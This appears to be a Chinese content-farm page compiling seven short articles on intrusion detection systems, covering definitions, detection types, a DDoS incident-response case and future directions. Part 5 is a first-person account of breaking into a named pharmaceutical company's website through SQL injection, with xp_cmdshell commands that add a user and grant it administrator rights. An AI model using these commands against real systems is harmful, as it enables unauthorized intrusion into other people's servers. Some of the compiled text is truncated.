一次入侵检测

时间:2023年04月26日

/

来源:FLY

/

编辑:本站小编

收藏本文

下载本文

下面是小编为大家收集的一次入侵检测,本文共7篇,仅供参考,欢迎大家阅读,希望可以帮助到有需要的朋友。本文原稿由网友“FLY”提供。

篇1:入侵检测

入侵检测(eTrustIntrusionDetection简称eID)提供了全面的网络保护功能,其内置主动防御功能可以防止破坏的发生,

入侵检测

这种高性能且使用方便的解决方案在单一软件包中提供了最广泛的监视、入侵和攻击探测、非法URL探测和阻塞、警告、记录和实时响应。

篇2:入侵检测

入侵检测(Intrusion Detection),顾名思义,就是对入侵行为的发觉。他通过对计算机网络或计算机系统中若干关键点收集信息并对其进行分析,从中发现网络或系统中是否有违反安全策略的行为和被攻击的迹象。

目录基本简介分类情况入侵分类工作步骤收缩展开基本简介

入侵检测(Intrusion Detection)是对入侵行为的检测。它通过收集和分析网络行为、安全日志、审计数据、其它网络上可以获得的信息以及计算机系统中若干关键点的信息,检查网络或系统中是否存在违反安全策略的行为和被攻击的迹象。入侵检测作为一种积极主动地安全防护技术,提供了对内部攻击、外部攻击和误操作的实时保护,在网络系统受到危害之前拦截和响应入侵。因此被认为是防火墙之后的第二道安全闸门,在不影响网络性能的情况下能对网络进行监测。入侵检测通过执行以下任务来实现:监视、分析用户及系统活动;系统构造和弱点的审计;识别反映已知进攻的活动模式并向相关人士报警;异常行为模式的统计分析;评估重要系统和数据文件的完整性;操作系统的审计跟踪管理,并识别用户违反安全策略的行为。 入侵检测是防火墙的合理补充,帮助系统对付网络攻击,扩展了系统管理员的安全管理能力(包括安全审计、监视、进攻识别和响应),提高了信息安全基础结构的完整性。它从计算机网络系统中的'若干关键点收集信息,并分析这些信息,看看网络中是否有违反安全策略的行为和遭到袭击的迹象。入侵检测被认为是防火墙之后的第二道安全闸门,在不影响网络性能的情况下能对网络进行监测,从而提供对内部攻击、外部攻击和误操作的实时保护。 这些都通过它执行以下任务来实现: ・监视、分析用户及系统活动 ・ 系统构造和弱点的审计 ・ 识别反映已知进攻的活动模式并向相关人士报警 ・ 异常行为模式的统计分析 ・ 评估重要系统和数据文件的完整性 ・操作系统的审计跟踪管理,并识别用户违反安全策略的行为。 对一个成功的入侵检测系统来讲,它不但可使系统管理员时刻了解网络系统(包括程序、文件和硬件设备等)的任何变更,还能给网络安全策略的制订提供指南。更为重要的一点是,它应该管理、配置简单,从而使非专业人员非常容易地获得网络安全。而且,入侵检测的规模还应根据网络威胁、系统构造和安全需求的改变而改变。入侵检测系统在发现入侵后,会及时作出响应,包括切断网络连接、记录事件和报警等。

分类情况

入侵检测系统所采用的技术可分为特征检测与异常检测两种。

特征检测

特征检测(Signature-based detection) 又称Misuse detection ,这一检测假设入侵者活动可以用一种模式来表示,系统的目标是检测主体活动是否符合这些模式。它可以将已有的入侵方法检查出来,但对新的入侵方法无能为力。其难点在于如何设计模式既能够表达“入侵”现象又不会将正常的活动包含进来。

异常检测

异常检测(Anomaly detection) 的假设是入侵者活动异常于正常主体的活动。根据这一理念建立主体正常活动的“活动简档”,将当前主体的活动状况与“活动简档”相比较,当违反其统计规律时,认为该活动可能是“入侵”行为。异常检测的难题在于如何建立“活动简档”以及如何设计统计算法,从而不把正常的操作作为“入侵”或忽略真正的“入侵”行为。

入侵分类

1)基于主机

一般主要使用操作系统的审计、跟踪日志作为数据源,某些也会主动与主机系统进行交互以获得不存在于系统日志中的信息以检测入侵。这种类型的检测系统不需要额外的硬件.对网络流量不敏感,效率高,能准确定位入侵并及时进行反应,但是占用主机资源,依赖于主机的可靠住,所能检测的攻击类型受限。不能检测网络攻击。

2)基于网络

通过被动地监听网络上传输的原始流量,对获取的网络数据进行处理,从中提取有用的信息,再通过与已知攻击特征相匹配或与正常网络行为原型相比较来识别攻击事件。此类检测系统不依赖操作系统作为检测资源,可应用于不同的操作系统平台;配置简.单,不需要任何特殊的审计和登录机制;可检测协议攻击、特定环境的攻击等多种攻击。但它只能监视经过本网段的活动,无法得到主机系统的实时状态,精确度较差。大部分入侵检测工具都是基于网络的入侵检测系统.

3)分布式

这种入侵检测系统一般为分布式结构,由多个部件组成,在关键主机上采用主机入侵检测,在网络关键节点上采用网络入侵检测,同时分析来自主机系统的审计日志和来自网络的数据流,判断被保护系统是否受到攻击。

工作步骤

对一个成功的入侵检测系统来讲,它不但可使系统管理员时刻了解网络系统(包括程序、文件和硬件设备等)的任何变更,还能给网络安全策略的制订提供指南。更为重要的一点是,它应该管理、配置简单,从而使非专业人员非常容易地获得网络安全。而且,入侵检测的规模还应根据网络威胁、系统构造和安全需求的改变而改变。入侵检测系统在发现入侵后,会及时作出响应,包括切断网络连接、记录事件和报警等。

篇3:入侵检测及网络安全

随着网络安全风险系数不断提高,曾经作为最主要的安全防范手段的防火墙,已经不能满足人们对网络安全的需求,作为对防火墙及其有益的补充,IDS(入侵检测系统)能够帮助网络系统快速发现攻击的发生,它扩展了系统管理员的安全管理能力(包括安全审计、监视、进攻识别和响应),提高了信息安全基础结构的完整性。     一、入侵检测系统(IDS)诠释IDS是一种网络安全系统,当有敌人或者恶意用户试图通过Internet进入网络甚至计算机系统时,IDS能够检测出来,并进行报警,通知网络该采取措施进行响应。在本质上,入侵检测系统是一种典型的窥探设备。它不跨接多个物理网段(通常只有一个监听端口),无须转发任何流量,而只需要在网络上被动地、无声息地收集它所关心的报文即可。入侵检测/响应流     目前,IDS分析及检测入侵阶段一般通过以下几种技术手段进行分析:特征库匹配、基于统计的分析和完整性分析,

其中前两种方法用于实时的入侵检测,而完整性分析则用于事后分析。     二、IDS存在的问题     1.误/漏报率高     IDS常用的检测方法有特征检测、异常检测、状态检测、协议分析等。而这些检测方式都存在缺陷。比如异常检测通常采用统计方法来进行检测,而统计方法中的阈值难以有效确定,太小的值会产生大量的误报,太大的值又会产生大量的漏报。而在协议分析的检测方式中,一般的IDS只简单地处理了常用的如HTTP、FTP、SMTP等,其余大量的协议报文完全可能造成IDS漏报,如果考虑支持尽量多的协议类型分析,网络的成本将无法承受。     2.没有主动防御能力IDS技术采用了一种预设置式、特征分析式工作原理,所以检测规则的更新总是落后于攻击手段的更新。     3.缺乏准确定位和处理机制     IDS仅能识别IP地址,无法定位IP地址,不能识别数据来源。IDS系统在发现攻击事件的时候,只能关闭网络出口和服务器等少数端口,但这样关闭同时会影响其他正常用户的使用。因而其缺乏更有效的响应处理机制。     4.性能普遍不足     现在市场上的IDS产品大多采用的是特征检测技术,这种IDS产品已不能适应交换技术和高带宽环境的发展,在大流量冲击、多IP分片情况下都可能造成IDS的瘫痪或丢包,形成DoS攻击。

篇4:一次成功的入侵检测和应急响应

文章作者:吴海民

8月27日,启明星辰公司接到某北京重要机关的电话,其网站系统可能遭受攻击,造成用户无法正常访问网站,希望启明星辰能够进行应急响应,对攻击进行处理,在做了必要的准备和沟通后,启明星辰迅速派出安全专家和相应的产品技术人员第一时间赶赴现场。

经过启明星辰安全技术人员在现场的分析,发现攻击者是采用了DDOS的攻击手法,向该机关的WEB服务器发起大量的服务请求,同时请求某一固定内容,严重消耗其带宽,因此丧失对外正常服务能力。在了解了攻击者的攻击手法后,应对攻击也就非常容易了。经过细致的策略配置和实施,最终将攻击阻断,并保证了网站的正常访问。用户对此非常满意。

从攻击角度说,这是一次非常典型的攻击事件,处理起来也是具有相应的难度。但是最终能够在很短的时间内解决问题,这中间有很多经验值得总结。必须指出的是,在这个过程中,启明星辰天阗入侵检测系统和规范的应急响应服务起到关键性的作用。下面我们就对该过程进行详细分析和经验总结:

1、 网络安全必须具有相对完善的预警、检测和必要的防御措施。

在防御措施上,该机关拥有两种类型的防火墙,配置了一定的访问控制策略,因此是可以阻止一些非信任地址的访问和基于网络层的拒绝服务攻击。但是这次攻击不是采用通用的拒绝服务攻击手法,因此,防火墙对此是无法做好提前防范的。

幸运的是,在该机关目前正在试运行两套启明星辰天阗入侵检测系统。通过天阗入侵检测系统,我们发现在其警报中大量存在对该网站的WEB非正常访问请求三种不同事件,并结合流量检测功能,发现来自与部分地址的连接请求数量严重超标。攻击者正是发送大量上述事件到该机关网站系统,导致网站堵塞;要使网站能够被正常访问,必须阻止上述三种事件的发生。通过上面的入侵检测的事件分析,该攻击被定性为基于WEB应用的有针对性的分布式拒绝服务攻击。

因此,在应对攻击事件的时候,防火墙是有一定的局限性的,只有通过入侵检测我们才能检测到基于应用的攻击行为的发生,并且判断出是何种攻击手段,这就是一个从不知到可知的过程。在进行应急响应的时候,入侵检测系统是必须事先部署的必备环节,否则,其分析攻击难度将增大很多。

2、 入侵检测系统必须具备强大的行为关联检测机制以及自定义检测功能

由于该攻击是针对WEB服务的分布式拒绝服务攻击,从攻击特征分析的角度看,其单个服务请求和正常的服务请求机制是相同的,

如果是简单的对这样的特征事件进行阻断,必然导致正常的服务请求也被中断。因此,这里我们用到了天阗行为关联分析机制和强大的自定义功能(VT++语言)。在这里我们区分是拒绝服务还是正常访问主要在于判断行为的关联性。拒绝服务的特点就是在短时间内出现大量的连接行为。因此,检测的机制就是基于异常行为的统计关联。然后通过采用简洁易用的自定义描述语言,形成对该种行为的事件定义,下发到探测引擎。

经过专门定义后,我们可以很容易的看出那些事件是正常访问造成,而那些事件是由攻击造成。

3、 入侵检测系统能够很好的和防御措施(如防火墙)形成动态防御

从应急响应的要求看,入侵检测的目的最终是阻止攻击行为,对已经造成攻击后果做相应恢复,并形成整体的安全策略调整。入侵检测系统本身是具有阻断功能的,但是如果单纯利用本身的阻断功能必然对入侵检测的效率有所影响。针对入侵检测后的动态防御,天阗提供了一个通用协议(VIP―FW),可以使防火墙和天阗入侵检测系统形成一个联动安全防御系统。当天阗发现了攻击事件,发送动态策略给防火墙,防火墙接收到策略后就产生一条对应的访问控制规则,可以对指定的攻击事件进行有效的阻断,保证攻击不再延续。这种联动的好处是即利用了防火墙的优势特点,又由于这些规则是根据攻击的发生而动态触发的,所以不会降低防火墙的工作效率。同时又由于启明星辰天阗入侵检测系统的联动标准早就为广大防火墙厂商普遍接受,这次该机关的两种防火墙已经具备了联动功能,所以,最后成功了实现了对分布拒绝服务攻击的防范,保证了网站的正常运行。

在这个实际应用的案例中,天阗入侵检测系统的作用表现得到了有力的证明。因此,一个好的入侵检测系统对保障用户的网络安全是起到积极而重要的作用。通过入侵检测,我们不仅能够知道攻击事件的发生、攻击的方式和手法,还可以指挥其它安全产品形成动态的防御系统,这就对网络的安全性建立一个有效屏障。

同时,我们也看到,用户和攻击者之间是存在着安全知识的不对称性的。要提高网络安全的防护能力,除了有效的安全产品部署和使用,必要的应急响应服务也是一个很好的保障手段。对用户来说,就需要选择一个好应急响应服务的合作伙伴。这样的合作伙伴要有诚信的服务意识、良好的网络安全技术背景、规范的服务流程和独到的安全服务人才和经验积累,能够在用户发生网络安全问题时候及时响应,并可以成功解决问题。

篇5:入侵检测修正药业

整天在网络上乱逛 不知道怎么的弹出一个修正药业的广告 点了进去就进修正的官方 在里面乱逛 看见一个注入

可是键入代码网页没有直接显示 我就丢到 Pangolin里面看看

果断的是注入点 后来验证是sa

是sa就太方便了

直接调用xp_cmdshell

上代码

;exec master..xp_cmdshell“net user name password /add”--

;exec master..xp_cmdshell“net localgroup name administrators /add”--

不解释,因为网页不显示 就抱着侥幸的心理去连3389

输入帐号密码 ....

篇6:细说下一代入侵检测

入侵检测的研究可以追溯到JamesP.Anderson在1980年的工作,他首次提出了威胁等术语,这里所指的威胁与入侵的含义基本相同,将入侵尝试或威胁定义为:潜在的、有预谋的、未经授权的访问企图,致使系统不可靠或无法使用,1987年DorothyE. Denning首次给出一个入侵检测的抽象模型,并将入侵检测作为一个新的安全防御措施提出。1988年,Morris蠕虫事件加快了对入侵检测系统(IDS :Intru

一、目前IDS存在的缺陷

入侵检测系统作为网络安全防护的重要手段,有很多地方值得我们进一步深入研究。目前的IDS还存在很多问题,有待于我们进一步完善。

1.高误警(误报)率

误警的传统定义是将良性流量误认为恶性的。广义上讲,误警还包括对IDS用户不关心事件的告警。因此,导致IDS产品高误警率的原因是IDS检测精度过低以及用户对误警概念的拓展。

2.产品适应能力低

传统的IDS产品在开发时没有考虑特定网络环境的需求,千篇 一律。网络技术在发展,网络设备变得复杂化、多样化,这就需要入侵检测产品能动态调整,以适应不同环境的需求。

3.大型网络的管理问题

很多企业规模在不断扩大,对IDS产品的部署从单点发展到跨区域全球部署,这就将公司对产品管理的问题提上日程。首先,要确保新的产品体系结构能够支持数以百计的IDS传感器;其次,要能够处理传感器产生的告警事件;此外,还要解决攻击特征库的建立,配置以及更新问题。

4.缺少防御功能

检测,作为一种被动且功能有限的技术,缺乏主动防御功能。因此,需要在下一代IDS产品中嵌入防御功能,才能变被动为主动。

5.评价IDS产品没有统一标准

对入侵检测系统的评价目前还没有客观的标准,标准的不统一使得入侵检测系统之间不易互联。随着技术的发展和对新攻击识别的增加,入侵检测系统需要不断升级才能保证网络的安全性。

6.处理速度上的瓶颈

随着高速网络技术如ATM、千兆以太网等的相继出现,如何实现高速网络下的实时入侵检测是急需解决的问题,

目前的百兆、千兆IDS产品的性能指标与实际要求还存在很大的差距。

二、下一代IDS系统采用的技术

为了降低误警率、合理部署多级传感器、有效控制跨区域的传感器,下一代入侵检测产品需要包含以下关键技术。

1.智能关联

智能关联是将企业相关系统的信息(如主机特征信息)与网络IDS检测结构相融合,从而减少误警。如系统的脆弱性信息需要包括特定的操作系统(OS)以及主机上运行的服务。当IDS使用智能关联时,它可以参考目标主机上存在的、与脆弱性相关的所有告警信息。如果目标主机不存在某个攻击可以利用的漏洞,IDS将抑制告警的产生。

智能关联包括主动关联和被动关联。主动关联是通过扫描确定主机漏洞;被动关联是借助操作系统的指纹识别技术,即通过分析IP、TCP报头信息识别主机上的操作系统。下面将详细介绍指纹识别技术。

(1)IDS有时会出现误报(主机系统本身并不存在某种漏洞,而IDS报告系统存在该漏洞)

造成这种现象的原因是当IDS检测系统是否受到基于某种漏洞的攻击时,没有考虑主机的脆弱性信息。以针对Windows操作系统的RPC攻击为例,当网络中存在RPC攻击时,即使该网络中只有基于Linux的机器,IDS也会产生告警,这就是一种误报现象。为了解决这个问题,需要给IDS提供一种基于主机信息的报警机制。因此新一代IDS产品利用被动指纹识别技术构造一个主机信息库,该技术通过对TCP、IP报头中相关字段进行识别来确定操作系统(OS)类型。

(2)被动指纹识别技术的工作原理

被动指纹识别技术的实质是匹配分析法。匹配双方一个是来自源主机数据流中的TCP、IP报头信息,另一个是特征数据库中的目标主机信息,通过将两者做匹配来识别源主机发送的数据流中是否含有恶意信息。通常比较的报头信息包括窗口大小(Windowsize)、数据报存活期(TTL)、DF(don'tfragment)标志以及数据报长(Totallength)。

窗口大小(wsize)指输入数据缓冲区大小,它在TCP会话的初始阶段由OS设定。多数UNIX操作系统在TCP会话期间不改变它的值,而在Windows操作系统中有可能改变。

篇7:入侵检测技术发展方向入侵检测

无论从规模与方法上入侵技术近年来都发生了变化,入侵的手段与技术也有了“进步与发展”。入侵技术的发展与演化主要反映在下列几个方面:

入侵或攻击的综合化与复杂化。入侵的手段有多种,入侵者往往采取一种攻击手段。由于网络防范技术的多重化,攻击的难度增加,使得入侵者在实施入侵或攻击时往往同时采取多种入侵的手段,以保证入侵的成功几率,并可在攻击实施的初期掩盖攻击或入侵的真实目的。

入侵主体对象的间接化,即实施入侵与攻击的主体的隐蔽化。通过一定的技术,可掩盖攻击主体的源地址及主机位置。即使用了隐蔽技术后,对于被攻击对象攻击的主体是无法直接确定的。

入侵或攻击的规模扩大。对于网络的入侵与攻击,在其初期往往是针对于某公司或一个网站,其攻击的目的可能为某些网络技术爱好者的猎奇行为,也不排除商业的盗窃与破坏行为。由于战争对电子技术与网络技术的依赖性越来越大,随之产生、发展、逐步升级到电子战与信息战。对于信息战,无论其规模与技术都与一般意义上的计算机网络的入侵与攻击都不可相提并论。信息战的成败与国家主干通信网络的安全是与任何主权国家领土安全一样的国家安全。

入侵或攻击技术的分布化。以往常用的入侵与攻击行为往往由单机执行。由于防范技术的发展使得此类行为不能奏效。所谓的分布式拒绝服务(ddos)在很短时间内可造成被攻击主机的瘫痪。且此类分布式攻击的单机信息模式与正常通信无差异,所以往往在攻击发动的初期不易被确认。分布式攻击是近期最常用的攻击手段。

攻击对象的转移。入侵与攻击常以网络为侵犯的主体,但近期来的攻击行为却发生了策略性的改变,由攻击网络改为攻击网络的防护系统,且有愈演愈烈的趋势。现已有专门针对ids作攻击的报道。攻击者详细地分析了ids的审计方式、特征描述、通信模式找出ids的弱点,然后加以攻击。

今后的入侵检测技术大致可朝下述三个方向发展,

分布式入侵检测:第一层含义,即针对分布式网络攻击的检测方法;第二层含义即使用分布式的方法来检测分布式的攻击,其中的关键技术为检测信息的协同处理与入侵攻击的全局信息的提取。

智能化入侵检测:即使用智能化的方法与手段来进行入侵检测。所谓的智能化方法,现阶段常用的有神经网络、遗传算法、模糊技术、免疫原理等方法,这些方法常用于入侵特征的辨识与泛化。利用专家系统的思想来构建入侵检测系统也是常用的方法之一。特别是具有自学习能力的专家系统,实现了知识库的不断更新与扩展,使设计的入侵检测系统的防范能力不断增强,应具有更广泛的应用前景。应用智能体的概念来进行入侵检测的尝试也已有报道。较为一致的解决方案应为高效常规意义下的入侵检测系统与具有智能检测功能的检测软件或模块的结合使用。

全面的安全防御方案:即使用安全工程风险管理的思想与方法来处理网络安全问题,将网络安全作为一个整体工程来处理。从管理、网络结构、加密通道、防火墙、病毒防护、入侵检测多方位全面对所关注的网络作全面的评估,然后提出可行的全面解决方案。

关 键 字:入侵检测

入侵检测系统(IDS)简介

Windows日志与入侵检测浅谈

检测一次多少钱

防患未然 juniper入侵防护系统入侵检测

检测Unix是否被入侵的快捷方法

下载一次入侵检测(整理7篇)
一次入侵检测.doc
将本文的Word文档下载到电脑,方便收藏和打印
推荐度:
点击下载文档
点击下载本文文档